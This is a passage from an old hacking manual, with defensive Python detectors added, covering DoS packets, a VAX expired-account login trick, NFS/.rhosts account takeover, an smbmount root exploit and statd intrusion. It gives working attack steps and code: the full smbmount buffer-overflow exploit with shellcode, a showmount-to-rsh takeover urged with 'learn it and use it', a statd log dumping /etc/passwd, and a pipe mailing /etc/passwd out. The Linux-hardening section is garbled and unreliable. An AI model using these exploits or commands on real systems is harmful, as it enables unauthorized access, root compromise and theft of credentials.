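# proto, local addr:port, foreign addr:port, state
_ROW = re.compile(r"^\s*TCP\s+(\S+):(\d+)\s+(\S+):(\d+)\s+(\S+)\s*$")


def half_open_by_port(netstat_text: str) -> Dict[int, int]:
    """Count connections in SYN_RECEIVED, keyed by local port."""
    counts: Counter = Counter()
    for line in netstat_text.splitlines():
        m = _ROW.match(line)
        if m and m.group(5) == "SYN_RECEIVED":
            counts[int(m.group(2))] += 1
    return dict(counts)


def synack_schedule(initial_timeout: float = 3.0, retries: int = 5) -> List[float]:
    """Cumulative seconds after the SYN at which each SYN-ACK retransmission
    is sent. The text gives the intervals (3, 6, 12, 24, 48 s, doubling each
    time); the retransmissions therefore happen at 3, 9, 21, 45 and 93 s."""
    times: List[float] = []
    elapsed, interval = 0.0, initial_timeout
    for _ in range(retries):
        elapsed += interval
        times.append(elapsed)
        interval *= 2
    return times


def resource_hold_seconds(initial_timeout: float = 3.0, retries: int = 5,
                          final_wait: float = 96.0) -> float:
    """Seconds one half-open entry stays allocated: the last retransmission
    time plus the final wait before the stack gives up (189 s by default)."""
    return synack_schedule(initial_timeout, retries)[-1] + final_wait


def steady_state_half_open(syn_rate_per_second: float,
                           hold_seconds: Optional[float] = None) -> float:
    """Half-open entries a sustained rate of unanswered SYNs keeps allocated
    (arrival rate times hold time). Compare with the stack's half-open limit."""
    hold = resource_hold_seconds() if hold_seconds is None else hold_seconds
    return syn_rate_per_second * hold


def ports_over_threshold(netstat_text: str, threshold: int) -> List[int]:
    """Local ports whose SYN_RECEIVED count reaches the threshold, busiest first."""
    counts = half_open_by_port(netstat_text)
    return sorted((p for p, c in counts.items() if c >= threshold),
                  key=lambda p: -counts[p])


if __name__ == "__main__":
    print("half-open per port:", half_open_by_port(SAMPLE_NETSTAT))
    print("SYN-ACK retransmissions at:", synack_schedule())
    print("each entry held for", resource_hold_seconds(), "seconds")
    print("10 unanswered SYN/s holds", steady_state_half_open(10), "entries")
    print("ports at or above 3 half-open:", ports_over_threshold(SAMPLE_NETSTAT, 3))
```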

      [13.3.6] Land Attack
      Land Attack sends SYN packets with the same source and destination IP addresses and the same source and destination ports to a host computer. This makes it appear as if the host computer sent the packet to itself. Windows NT operates more slowly while the host computer tries to respond to itself.
      [13.3.7] Teardrop
      Two specially fragmented IP datagrams are sent to the victim. The first is the 0 offset fragment with a payload of size N, with the MF bit on (data content is irrelevant). The second is the last fragment (MF == 0) with a positive offset < N and with a payload of < N. The fragmented datagrams will try to realign themselves, however, the payload of the current fragment does NOT contain enough data to cover the realigning. This will cause a reboot or a halt, depending on how much physical memory you've got.
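      Both 13.3.6 and 13.3.7 are malformed packets that a filter or IDS can recognise from header fields alone. The following Python is an added example, not part of the original text: it models the relevant IP and TCP header fields as a small record and implements the two checks, the Land test (a SYN whose source and destination address and port are identical) and the Teardrop test (a later fragment of the same datagram whose offset plus payload length falls short of the end of the 0-offset fragment, so a reassembler that trusts the offsets computes a negative copy length). The Teardrop check is written for any fragment with those bounds, not only the MF == 0 last fragment the text describes, since the bad length arises the same way; the sample traffic is constructed.

```python
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple


@dataclass(frozen=True)
class Packet:
    """Only the header fields the two checks need (host byte order)."""
    src: str
    dst: str
    ident: int                   # IP identification: groups fragments of one datagram
    frag_offset: int             # in bytes (the header stores it in 8-byte units)
    more_fragments: bool         # the MF bit
    payload_len: int             # bytes of data carried by this fragment
    sport: Optional[int] = None  # TCP ports, present only where the TCP header is
    dport: Optional[int] = None
    syn: bool = False


def is_land_packet(p: Packet) -> bool:
    """13.3.6: a SYN whose source equals its destination, address and port alike."""
    return p.syn and p.src == p.dst and p.sport is not None and p.sport == p.dport


def teardrop_fragment(first: Packet, later: Packet) -> bool:
    """13.3.7: 'later' claims to continue 'first' (same ident) but ends before
    'first' does. Reassembly code that computes end - offset from these
    values gets a negative length for its copy."""
    if first.ident != later.ident or first.frag_offset != 0 or not first.more_fragments:
        return False
    if later.frag_offset <= 0:
        return False
    first_end = first.frag_offset + first.payload_len
    later_end = later.frag_offset + later.payload_len
    return later_end < first_end


def scan(packets: List[Packet]) -> List[Tuple[int, str]]:
    """Return (index, reason) for every packet that trips a check."""
    findings: List[Tuple[int, str]] = []
    first_frags: Dict[Tuple[str, str, int], Packet] = {}
    for i, p in enumerate(packets):
        if is_land_packet(p):
            findings.append((i, "land: src==dst and sport==dport"))
        key = (p.src, p.dst, p.ident)
        if p.frag_offset == 0 and p.more_fragments:
            first_frags[key] = p
        elif key in first_frags and teardrop_fragment(first_frags[key], p):
            findings.append((i, "teardrop: fragment ends inside the first fragment"))
    return findings


# Constructed traffic: a normal SYN, a Land packet, a well-formed two-fragment
# datagram (N = 36, second fragment at 36 with 20 bytes) and a Teardrop pair
# (N = 36, second fragment at offset 24 carrying only 4 bytes).
SAMPLE_PACKETS = [
    Packet("198.51.100.7", "192.0.2.10", 1, 0, False, 0, sport=1033, dport=80, syn=True),
    Packet("192.0.2.10", "192.0.2.10", 2, 0, False, 0, sport=139, dport=139, syn=True),
    Packet("203.0.113.4", "192.0.2.10", 3, 0, True, 36, sport=4000, dport=53),
    Packet("203.0.113.4", "192.0.2.10", 3, 36, False, 20),
    Packet("203.0.113.9", "192.0.2.10", 4, 0, True, 36, sport=4001, dport=53),
    Packet("203.0.113.9", "192.0.2.10", 4, 24, False, 4),
]


if __name__ == "__main__":
    for index, reason in scan(SAMPLE_PACKETS):
        print(f"packet {index}: {reason}")
```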
      [13.3.8] Pentium Bug
      When an Intel processor receives a specific invalid instruction, your computer may stop responding (hang). Your computer must be turned off and restarted to return to normal operation.
      If you execute F0 0F C7 C8 on a P5 it will lock the machine up.
      [14.0.0] VAX/VMS Makes a comeback (expired user exploit)
      This is an explanation of a VAX exploit that was discovered. The exploit functions in that when a username has expired it doesn't delete the username; it just puts a new password on the username named temporary password, until the user can input a new password to reactivate his account. I will explain this exploit step by step, but this text is intended for a more advanced reader. Remember VAX/VMS is a very secure area to work in; you can get caught if you don't know what you are doing. Well, in this text I will give you a server that has this exploit so you can verify it yourself.
      Another thing is that you need to know about how to use the telnet program; if you don't know, get a guide and start learning before using this.
      Step by Step explanation: (if you dont own an account on the VMS/VAX)
      [14.0.1] Step 1:
      Finger the users of the server if you have a finger utility, but you need one that gives you the last date login.
      [14.0.2] Step 2:
      Get the usernames that have an old date like a year ago, basically, something that looks expired.
      [14.0.3] Step 3:
      Now go to the login screen of the server and type in the username. When it prompts you for a password you will type the word temp. Now at this moment you will be entering the VAX system and it will prompt you to type a new password because the password has expired. As you can see you now own a user privilege account.
      [14.0.4] Note:
      The easiest way to find systems that are exploitable is to check universities. As we know most universities issue students usernames that are the first letter of their first name and the last name. Example: If your name is John Doe your username would be jdoe. So the best thing [...] user names that have [...] the last year or so ago.
      -Props to Hellmaster for the technique.
      [15.0.0] Lin#9B>o >&u ;Sstyootjuhe gat tt lnuest lirox nsstro installed? What now? How ecurity. You need to immediately secure your se tem after installation if you want your 0-dasato (e pefeales iciyolyhaf ou ong. n rec) wHed I will try and show ways to pd local attacks. Thecks.s should work on redhat and debian, but it is primarily made forckware, the best distro out S5.p 1]tcicne/e.c/if tdThon f. e isllilintells atetaewhns dg mons to open up each time it is ru fy d epaitpblavtolaoce ho l aal tstnend oeln td ape. toosllupClnye er ace sthvi ys fatl ou% eel are not imperative repniou bunstngkiy aicking a # in front of the service] Step 2: Permissions. Make sure that your root directory is only readable to root to prevent prers from snooping. Type: . Also, make sure that only the correct owner can snoop t sough home directories. cd /home ; chmod 700 * . That sho chmod 700 /mnt ; chmod 700 /floppy ; chmod 700 /cdrom . Then you should have all the pel thectly.
      *Side note: You may want to only use X-windows as rows (thats what I do), as X-win binarystod xpy it e slote a Sysmam.e o aybhmdo 7 chmodr/001/usn X1chbid ; chmod 700 /usr/X11R6/bin . <: 3C /BrvRPesseTricty. ngy pcpifo rp inca -osloanlhset whd ye gat ou get. Remember the results arc.d . Look through thosvar oue rprises erc Crvmes. tom rnt shevipcs er ncedeas needed in those files. Almost eedure call is exploitable. Its better just not to run t.
      [15.0.4] Step 4: . ysysopopttllnos au ow syo wtot eeerhaarusdos are eninhewhen they login to your box. H>o petcicne/e.c/if tdd onicana stmmk a co) en f(#.$in front of the line that readstream tcp nowait roowai.telnetd
      Then look 3 lines below. You will see:
      #telneP>stream tcp nowait root /usr/sbinin.telnetsnoopd
      Uncomment that line, and sav athe file. Then restart inetd by typeing:
      ps -aux |grept the pid #)
      kill -9 (pid #)
      inetd
      Then it should be restarted and you can tou it out by telnet and logging in , and then in another window type w to find out wndt tty you just logged into and then type: ttysnoop ttyp# . Y able to see everything that the user types in. Very effective.
      [15.0.5] Step 5: 5tching them. You should of who is on your system at any given time. A good way to dos is to, if you are in X-windows-font 5x8 -file /var/log/message/mes550x80 . This will open a small xconsole window that will tel you teo is connecting to you. Keep thirner. The next step is to get tcpdump. Find it at d nsite. type tcpdump in a smaill xterm and keer corner. What that will do is show ys evee sttgl clineleioontoctoun Su y a. cochecs onnnfrti es ryomorvery port.
      [15.0Misc security programs.
      -SSH : Secure shell- This program is a replacement [for telnet ...]. [...] more servers are using this everyday because of [...]. [...] the server that you are telneting to [...] as well for it to work =)
      -[...] : [...]- This program is [...] customizable and provides [...] that extra edge of security to your login sequence.
      -COPS : Computer Oracle and Password System- This nice little program automatically scans your system for misconfigurations and warns you of the weaknesses. Its an excellent way to systematically check for file permission mistakes.
      By following the above steps, you have stopped about 99.8% of all hackers breaking into your system (Just hope you don't meet up with some Russian hacker =) You will be invincible on IRC. Considering in all my time with Linux, I've never been hacked. Peace out.
      -Phreak-0 (Phreak_0@hotmail.com)
      Thanks to Phreak-0 for that portion.
      [16.0.0] Unix Techniques. New and Old.
      [16.0.1] ShowMount Technique
      This is an old school technique that most hackers don’t know. The two commands you need to learn are showmount and mount.
      They are used in the following way:
      Intercore:~#mount server.com:/remotefolder /localfolder
      After you issue the command, do cd /localfolder and you will be in the remote computer's shared folder. remotefolder is the folder on the remote system that you want to mount. localfolder is where you want the remote folder to appear on your system. So if you do mount server:/remote /mnt then on your local system you can do cd /mnt and browse around inside that folder. The contents of that folder will be the contents of the remote folder that was shared.
      [16.0.2] DEFINITIONS:
      showmount lists all the clients that have remotely mounted a filesystem from host. This information is maintained by the mountd server on host, and is saved across crashes in the file /etc/rmtab.
      -e Print the list of shared file systems.
      mount attaches a file system to the file system hierarchy at the mount_point, which is the pathname of a directory. If mount_point has any contents prior to the mount operation, these are hidden until the file system is unmounted.
      umount unmounts a currently mounted file system, which may be specified either as a mount_point or as special, the device on which the file system resides.
      rhosts These files (/etc/hosts.equiv and .rhosts) specify remote hosts and users that are considered trusted. Trusted users are allowed to access the local system without supplying a password. The remote authentication procedure determines whether a user from a remote host should be allowed to access the local system with the identity of a local user. This procedure first checks the /etc/hosts.equiv file and then checks the .rhosts file in the home directory of the local user who is requesting access. Entries in these files can be of two forms. Positive entries allow access, while negative entries deny access. The authentication succeeds when a matching positive entry is found.
      hostname [username]
      The special character `+' can be used in place of either hostname or username to match any host or user. For example, the entry
      + +
      gives any user at any host access to the shell without supplying a password.
      rpcinfo makes an RPC call to an RPC server and reports what it finds. In the first synopsis, rpcinfo lists all the registered RPC services with rpcbind on host.
      rpcinfo -p [host]
      A showmount on ninja.com would look like this:
      InterCore:/home/chameleon/ $/usr/sbin/showmount -e www.ninja.com
      export list for www.ninja.com:
      /home Everyone
      /usr elite.ninja.com
      /var samuri.ninja.com
      InterCore:/home/chameleon/ $
      The first part is the folder name. The second part is who has access. If it says Everyone then anyone at all can access that folder. If it has an address like elite.ninja.com, only people from elite.ninja.com can access that folder. If a users folder, a home folder etc… is shared to everyone then you can gain a user account on the system. You would do the following. Say we use ninja.com as an example. We saw earlier that we have access to /home, so we would mount /home, go to a user's directory and create ourselves an rlogin for the system. The attack would be as follows.
      InterCore:/home/chameleon$ /usr/sbin/showmount -e www.ninja.com
      export list for www.ninja.com:
      /home Everyone
      /usr elite.ninja.com
      /var samuri.ninja.com
      Now, you must su to root to have access to mount things to various folders on the system.
      InterCore:/home/chameleon/ $su
      Password:
      InterCore:/home/chameleon#
      InterCore:/home/chameleon# mount www.ninja.com:/home /mnt
      InterCore:# cd /mnt
      InterCore:/mnt/ # ls
      jmwaller paget pamcourt papabear parsetru pathenry patsyk paulavic
      pa1230 paintere pamdon papas partsman patio patti778 pauld
      pac paintroc pamelaj pappabea pataiki patj pattic pauline
      packers paiyn pamelat papryor pataul patjohn pattie paulj
      paddock pal pamh paris1 patbrady patmon pattil paull1
      padgettr paladin pamomary parkerh patc patmraz pattygae paulpj
      What you are looking at here is the contents of www.ninja.com's home dir.
      Now lets add one of their users to our passfile, so we can become them.
      InterCore:# pico /etc/passwd
      add the lines:
      pamcourt::200:10023:Pam Court:/home/chameleon/mnt/pamcourt/:/bin/bash
      ^---we put this as the home dir, because this is where the mounted home directory is located.
      now, login locally as pamcourt
      InterCore:/mnt/home/pamcourt/$ whoami
      pamcourt
      InterCore:/mnt/home/pamcourt/$ echo "+ +" > ~/.rhosts
      This will make the rhosts entry + +, which means anyone from any host can remotely issue commands as that user. Now, we remotely login to ninja.com as pamcourt
      InterCore:/mnt/home/pamcourt/$rsh -l pamcourt www.ninja.com csh -i
      Welcome to ninja.com
      We are lame and left open a filesharing backdoor.
      You therefore have a shell on ninja.com. The rsh and rlogin syntax is as follows:
      rsh [ -l login ] [ -n ] host command
      rlogin [ -E | -ex ] [ -l username ] [ -8 ] [ -L ] host
      That is how to gain a user account onto a remote system. Also if you can spoof your dns or maybe the server has a router on it etc… that you can bounce through you could therefore access any files that are shared to that restricted host. Ex: in our above example if we spoofed as elite.ninja.com we would then have access to /usr. Although this technique is old it still works on many servers. So learn it and use it.
      To check if a server has filesharing do: rpcinfo -p server.com
      terra:/home/m/mgi/.noid $rpcinfo -p oberon.calstatela.edu
      program vers proto port service
      100000 4 tcp 111 rpcbind
      100000 3 tcp 111 rpcbind
      100000 2 udp 111 rpcbind
      100004 2 udp 713 ypserv
      100004 2 tcp 714 ypserv
      100003 2 udp 2049 nfs
      If it has a line like the one above that says nfs, then it has filesharing.
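Added example, not from the original text: Python helpers that check a host for the exposure the showmount, rhosts and rpcinfo passages above describe, written from the administrator's side. They parse showmount -e and rpcinfo -p output (the sample inputs are copies of the ninja.com and rpcinfo listings above, with nothing added) and scan a .rhosts file for the + wildcard defined in [16.0.2]. The function names are constructed for this example.

```python
"""Export / rpc / .rhosts exposure audit (added example, constructed names)."""
import re

# Values that appear in showmount -e output for an export any client may mount:
# the text's "Everyone", Linux's "(everyone)", or a bare "*".
OPEN_CLIENT_TOKENS = {"everyone", "(everyone)", "*"}


def parse_exports(showmount_text):
    """Map each exported path to its list of permitted clients."""
    exports = {}
    for line in showmount_text.splitlines():
        line = line.strip()
        if not line or line.lower().startswith("export list"):
            continue  # skip the "export list for host:" header
        path, _, clients = line.partition(" ")
        exports[path] = [c for c in re.split(r"[,\s]+", clients.strip()) if c]
    return exports


def open_exports(showmount_text):
    """Paths exported to everyone, the case the text above abuses via /home."""
    return [path for path, clients in parse_exports(showmount_text).items()
            if any(c.lower() in OPEN_CLIENT_TOKENS for c in clients)]


def registered_rpc_services(rpcinfo_text):
    """Service names registered with the portmapper, from rpcinfo -p output."""
    services = set()
    for line in rpcinfo_text.splitlines():
        fields = line.split()
        # program  vers  proto  port  service
        if len(fields) >= 5 and fields[0].isdigit():
            services.add(fields[4])
    return services


def nfs_registered(rpcinfo_text):
    return "nfs" in registered_rpc_services(rpcinfo_text)


def rhosts_findings(rhosts_text):
    """(line number, description) for every positive entry that uses the '+'
    wildcard. Negative entries (leading '-') deny access and are not reported."""
    findings = []
    for n, line in enumerate(rhosts_text.splitlines(), 1):
        fields = line.split()
        if not fields or fields[0].startswith("#"):
            continue
        host = fields[0]
        user = fields[1] if len(fields) > 1 else None
        if host.startswith("-") or (user is not None and user.startswith("-")):
            continue
        if host == "+" and user == "+":
            findings.append((n, "any user from any host"))
        elif host == "+":
            findings.append((n, "any host, user %s" % (user or "same name")))
        elif user == "+":
            findings.append((n, "any user from %s" % host))
    return findings


# Sample inputs copied from the listings above (constructed test data).
SHOWMOUNT_OUTPUT = """\
export list for www.ninja.com:
/home Everyone
/usr elite.ninja.com
/var samuri.ninja.com
"""

RPCINFO_OUTPUT = """\
program vers proto port service
100000 4 tcp 111 rpcbind
100000 3 tcp 111 rpcbind
100000 2 udp 111 rpcbind
100004 2 udp 713 ypserv
100004 2 tcp 714 ypserv
100003 2 udp 2049 nfs
"""


def audit_report(showmount_text, rpcinfo_text, rhosts_text=""):
    """One finding string per problem, in the order an admin would read them."""
    report = []
    if nfs_registered(rpcinfo_text):
        report.append("nfs is registered with rpcbind (filesharing is on)")
    for path in open_exports(showmount_text):
        report.append("%s is exported to everyone" % path)
    for n, why in rhosts_findings(rhosts_text):
        report.append(".rhosts line %d allows %s" % (n, why))
    return report


if __name__ == "__main__":
    for line in audit_report(SHOWMOUNT_OUTPUT, RPCINFO_OUTPUT, "+ +\n"):
        print(line)
```

Against the ninja.com listing this reports that nfs is registered, that /home is open to everyone, and (if a user's .rhosts contains the "+ +" line from the walk-through) that any user from any host is trusted; /usr and /var, restricted to named hosts, are not flagged.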
      [16.0.3] COMPARISON TO THE MICROSOFT WINDOWS FILESHARING
      NBTSTAT -a www.ninja.com would show the NetBIOS Statistics which includes shared folders (directories)
      C:\>nbtstat -A 204.73.131.11
                 NetBIOS Remote Machine Name Table
             Name               Type         Status
          ---------------------------------------------
          STUDENT1       <20>  UNIQUE      Registered
          STUDENT1       <00>  UNIQUE      Registered
          DOMAIN1        <00>  GROUP       Registered
          DOMAIN1        <1C>  GROUP       Registered
          DOMAIN1        <1B>  UNIQUE      Registered
          STUDENT1       <03>  UNIQUE      Registered
          DOMAIN1        <1E>  GROUP       Registered
          DOMAIN1        <1D>  UNIQUE      Registered
          ..__MSBROWSE__.<01>  GROUP       Registered
          MAC Address = 00-C0-4F-C4-8C-9D
      C:\>net view 204.73.131.11
      Shared resources at 204.73.131.11
      Share name   Type   Used as   Comment
      ------------------------------------------------------------------------------
      NETLOGON     Disk             Logon server share
      Test         Disk
      The command completed successfully.
      C:\>net use x: \\204.73.131.11\test
      The command completed successfully.
      [16.0.4] SMBXPL.C
      /*
      The default parameters to the program
      often work, however I have found that the offset parameter sometimes
      varies wildly, values between -600 and -100 usually work though, a quick
      shell script will scan through these.
      */
      /*
      ** smbexpl -- a smbmount root exploit under Linux
      **
      ** Author: Gerald Britton <gbritton@nih.gov>
      **
      ** This code exploits a buffer overflow in smbmount from smbfs-2.0.1.
      ** The code does not do range checking when copying a username from
      ** the environment variables USER or LOGNAME. To get this far into
      ** the code we need to execute with dummy arguments of a server and a
      ** mountpoint to use (./a in this case). The user will need to create
      ** the ./a directory and then execute smbexpl to gain root. This code
      ** is also setup to use /tmp/sh as the shell as bash-2.01 appears to
      ** do a seteuid(getuid()) so /bin/sh on my system won't work. Finally
      ** a "-Q" (an invalid commandline argument) causes smbmount to fail when
      ** parsing args and terminate, thus jumping into our shellcode.
      **
      ** The shellcode used in this program also needed to be specialized as
      ** smbmount toupper()'s the contents of the USER variable. Self modifying
      ** code was needed to ensure that the shellcode will survive toupper().
      **
      ** The quick fix for the security problem:
      ** chmod -s /sbin/smbmount
      **
      ** A better fix would be to patch smbmount to do bounds checking when
      ** copying the contents of the USER and LOGNAME variables.
      **
      */
      #include <stdlib.h>
      #include <stdio.h>
      #include <string.h>   /* strlen() */
      #include <unistd.h>   /* execl() */

      #define DEFAULT_OFFSET -202
      #define DEFAULT_BUFFER_SIZE 211
      #define DEFAULT_ALIGNMENT 2
      #define NOP 0x90

      /* This shell code is designed to survive being filtered by toupper() */
      char shellcode[] =
        "\xeb\x20\x5e\x8d\x46\x05\x80\x08\x20\x8d\x46\x27\x80\x08\x20\x40"
        "\x80\x08\x20\x40\x80\x08\x20\x40\x40\x80\x08\x20\x40\x80\x08\x20"
        "\xeb\x05\xe8\xdb\xff\xff\xff"
        "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
        "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
        "\x80\xe8\xdc\xff\xff\xff/tmp/sh";

      /* Current stack pointer; i386 only, the value is left in %eax as the return value */
      unsigned long get_sp(void) {
          __asm__("movl %esp,%eax");
      }

      int main(int argc, char *argv[]) {
          char *buff, *ptr;
          long *addr_ptr, addr;
          int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
          int alignment=DEFAULT_ALIGNMENT;
          int i;

          if (argc > 1) bsize = atoi(argv[1]);
          if (argc > 2) offset = atoi(argv[2]);
          if (argc > 3) alignment = atoi(argv[3]);
          printf("bsize=%d offset=%d alignment=%d\n",bsize,offset,alignment);

          if (!(buff = malloc(bsize))) {
              printf("Can't allocate memory.\n");
              exit(0);
          }

          addr = get_sp() - offset;
          fprintf(stderr,"Using address: 0x%lx\n", addr);

          /* fill the buffer with the guessed address, then NOPs, then the shellcode */
          ptr = buff;
          addr_ptr = (long *) (ptr+alignment);
          for (i = 0; i < bsize-alignment; i+=4)
              *(addr_ptr++) = addr;
          for (i = 0; i < bsize/2; i++)
              buff[i] = NOP;
          ptr = buff + (128 - strlen(shellcode));
          for (i = 0; i < strlen(shellcode); i++)
              *(ptr++) = shellcode[i];
          buff[bsize - 1] = '\0';

          setenv("USER",buff,1);
          execl("/sbin/smbmount","smbmount","//a/a","./a","-Q",(char *)0);
          return 0;
      }
      [16.0.5] Basic Unix Commands
      pwd - Shows the current directory that you are in.
      cd - change directory. Ex: cd hack would put you into the directory hack
      cd .. would drop you back 1 directory. So if you are in /home/chameleon and you type cd .. you would then be in /home
      ls - List files. ls -a to show ALL files. ls -l to list files in long format with byte size etc.. ls -la to do both.
      chmod - This command changes permissions of a file or directory. The syntax is as follows:
      chmod who[+|-|=][r|w|x] filename
      who can be u (user) g (group) o (other) a (all)
      The + means to add the permission and - means to remove the permission.
      cat - This prints out stuff to the screen, such as files. Ex: cat /etc/passwd would print the password file to the screen. You could also do cat /etc/passwd > password.txt; this would redirect the output of passwd into the file password.txt, that is what the > is used for.
      passwd - Changes the password of a user's account.
      ps - Shows what processes you have running. ps -e will show everything that you have running.
      grep - Searches for words that you specify. This can be used to search a file for a certain word
      Ex:
      $ grep rhino9 elite.txt
      Rhino9 is elite…
      $
      we could also use this to find a username without a password in the passwd file. We would do cat /etc/passwd | grep ::
      mv - Moves (renames) files and directories. Syntax: mv filename newfilename You can also pass folder arguments such as mv /etc/passwd /etc/passwd.txt Example mv command.
      $ ls
      rhino9
      $ mv rhino9 rhino9.txt
      $ ls
      rhino9.txt
      $
      cp - Copy. Syntax: cp filename copiedfilename You can also pass folder arguments
      ex: cp /e/beer /e/beer.txt
      man - Manual pages. Syntax: man commandyouneedhelpon. Ex: man grep would give you help on the grep command
      --help - Get help on certain commands. Ex: finger --help
      mkdir - Creates a directory. Syntax: mkdir newdirname
      rmdir - Removes a directory. Syntax: rmdir dirname
      rm - Removes files and folders. Syntax: rm filename or rm -R foldername (most systems)
      write - Write to another user's terminal. Syntax: write user ttyname then hit enter then type stuff then ctrl+d
      mesg - Turns on or off write access to your terminal. Syntax: mesg y (on) mesg n (off)
      su - While you are already logged into a system, you can log in with another account. su username
      w - Shows who is online.
      who - shows who is online.
      [16.0.6] Special Characters in Unix:
      * - matches any number of single characters eg. $ ls john* will list all files that begin with john
      [...] - matches any one of the characters in the [ ]
      ? - matches any single character
      & - runs a process in the background leaving your terminal free
      $ - values used for variables also $n - null argument
      > - redirects output eg. ls -la > /tmp/list
      < - redirects input to come from a file
      >> - redirects command output to be added (appended) to the end of a file
      | - pipe output (eg: cat /etc/passwd | mail tk85@hotmail.com will mail tk85@hotmail.com the /etc/passwd file)
      [16.0.7] File Permissions Etc..
      -rwxrwxrwx 1 user group 5 Dec 22 12:52 filename
      The first section is the file permissions, read & write etc..
      If the first character is:
      - - is an ordinary file
      d - is a directory
      b - is a block file
      c - is a character file
      The next 3 characters after the first char are the owner's rights to the file. They can be r or w or x or all 3 or whatever. The second 3 characters are the group rights to the file and they can be r or w or x or all 3 or whatever. The last 3 characters are everyone else's rights to the file and they can be r or w or x.
      r - read
      w - write
      x - execute
      The next section after -rwxrwxrwx is how many files are within that folder. If it is not a folder then it will be 1 and if it is a folder then it will be how many files are in it. The next section after that is the username section. It is the username of the owner of the file. So therefore whoever's name is there has the owner rights as described earlier. Then after that is the groupname. It is the name of the group that the file is in. Whatever the groupname is, the group rights apply to it. Then comes the file size, then the file date and lastly the file name.
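Added example, not from the original text: a Python parser for the ls -l permission field described above. It converts the field to an octal mode and flags what a post-install permission check cares about (setuid/setgid bits, world-writable files, home directories readable by group or other, i.e. looser than the chmod 700 recommended in [15.0.0]). It also handles the s, S, t and T letters, which the text does not cover. Function names and the sample listing are constructed; only the listing's first line comes from the text.

```python
"""ls -l permission field parser and audit (added example, constructed names)."""

FILE_TYPES = {"-": "file", "d": "directory", "b": "block device",
              "c": "character device", "l": "symlink", "p": "fifo", "s": "socket"}


def parse_mode(mode_str):
    """'-rwsr-xr-x' -> ('file', 0o4755). s/S mark setuid (owner column) and
    setgid (group column), t/T the sticky bit (other column); an upper-case
    letter means the special bit is set but the execute bit underneath is not."""
    if len(mode_str) != 10:
        raise ValueError("expected 10 characters such as -rwxr-xr-x")
    ftype = FILE_TYPES.get(mode_str[0], "unknown")
    mode = 0
    for i, ch in enumerate(mode_str[1:]):   # i = 0..8: owner, group, other triplets
        bit = 1 << (8 - i)
        if ch in "rwx":
            mode |= bit
        elif ch in "sS" and i in (2, 5):
            mode |= 0o4000 if i == 2 else 0o2000
            if ch == "s":
                mode |= bit
        elif ch in "tT" and i == 8:
            mode |= 0o1000
            if ch == "t":
                mode |= bit
        elif ch != "-":
            raise ValueError("bad permission character %r at column %d" % (ch, i + 2))
    return ftype, mode


def findings_for(mode_str):
    """Human-readable findings for one permission field."""
    ftype, mode = parse_mode(mode_str)
    out = []
    if mode & 0o4000:
        out.append("setuid")
    if mode & 0o2000:
        out.append("setgid")
    if mode & 0o002:
        out.append("world-writable")
    if ftype == "directory" and mode & 0o077:
        out.append("directory open to group/other")   # looser than chmod 700
    return out


def audit_ls_output(ls_text):
    """{name: findings} for every ls -l line; lines with fewer than 9 fields
    (such as 'total 12') are ignored."""
    results = {}
    for line in ls_text.splitlines():
        fields = line.split()
        if len(fields) < 9:
            continue
        name = " ".join(fields[8:])   # file names may contain spaces
        results[name] = findings_for(fields[0])
    return results


# Constructed sample listing; the first line is the example from the text.
SAMPLE_LS = """\
-rwxrwxrwx 1 user group 5 Dec 22 12:52 filename
-rwsr-xr-x 1 root root 30000 Dec 22 12:52 smbmount
drwx------ 2 pamcourt users 4096 Dec 22 12:52 pamcourt
drwxr-xr-x 2 paget users 4096 Dec 22 12:52 paget
-rw-r--r-- 1 root root 1024 Dec 22 12:52 passwd
"""

if __name__ == "__main__":
    for name, problems in audit_ls_output(SAMPLE_LS).items():
        print("%-10s %s" % (name, ", ".join(problems) or "ok"))
```

The setuid finding on the constructed smbmount line is the condition the comment block in [16.0.4] fixes with chmod -s; the paget line shows a home directory that Step 2 of [15.0.0] would have you chmod 700.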
      Passwd Entry Break Down
      chameleon:k54doPeHte:0:0:root of all evil:/home/chameleon:/bin/bash
      A - Username (chameleon)
      B - Encrypted pass (k54doPeHte)
      C - user id (0)
      D - group id (0)
      E - comments (root of all evil)
      F - home directory (/home/chameleon)
      G - shell the user uses (/bin/bash)
      [16.0.8] STATD EXPLOIT TECHNIQUE
      Statd is one of the best C file exploits in a long time. Statd single handedly exploits SunOS X.X & Sys V systems. It works by exploiting a buffer overflow through rpc and drops you into root on a remote system. There are statd scanners and other neat tools that can be found at
      www.d-lab.com.ar/sekret/warez (home of the famous Code Zero). Once you have the statd exploit program (runs on some sunos & sys v servers) you will want to use a scanner to scan a large list of servers for statd exploitable ones. One good way of finding statd exploitable servers is going to yahoo and then searching for "sys v", then trying the different servers that yahoo finds. You can use a program called "hosts" by Devix that will dump server names from html files. So if you go to yahoo and then search for sys v you could dump all the servers into a text file with the hosts program and then use a statd scanner to have it check for statd exploitable servers. Devix’s hosts program can be found on the rhino9 site. Ok, so say you have found a statd exploitable server. You type at your prompt: statd server.com. Here is a log of an actual hack using statd. Note: Comments have *’s around them.
      InterCore:/home/chameleon/ $statd www.victim.com
      *This server is statd exploitable but the server admin has been notified so don’t try it.*
      rpc.statd is located on tcp port 44417
      sent exploit code, now waiting for shell...
      *first thing to do is type, w, to see who is on and if any sysadmins are active*
      # w
      5:27am up 3 day(s), 6:35, 4 users, load average: 0.05, 0.06, 0.07
      User tty login@ idle JCPU PCPU what
      gabe pts/3 Sat 1am 2:38 1:37 -tcsh
      gburgyan pts/4 Fri11pm 55 20 2 pine
      gabe pts/5 Sat 7am 3:08 29 -tcsh
      gburgyan pts/8 Mon 4am 23:22 16 -tcsh
      *Note: statd is not telnet so you wont show up when someone does w etc.. so you are a ghost*
      # cat /etc/passwd
      root:x:0:1:System Administrators:/:/sbin/sh
      daemon:x:1:1:0000-Admin(0000):/:
      bin:x:2:2:0000-Admin(0000):/usr/bin:
      sys:x:3:3:0000-Admin(0000):/:
      adm:x:4:4:0000-Admin(0000):/var/adm:
      kane:x:539:107:Kane Products FTP account:/usr/www/docs/kane/:/bin/true
      ecco:x:540:107:ECCO:/usr/www/clients/ecco/:/bin/true
      iodatsys:x:541:107:I/O Data Systems:/usr/www/clients/iodatasys/:/bin/true
      nealschu:x:542:107:Neal Schuman FTP Account:/usr/www/clients/nealschuman/:/bin/true
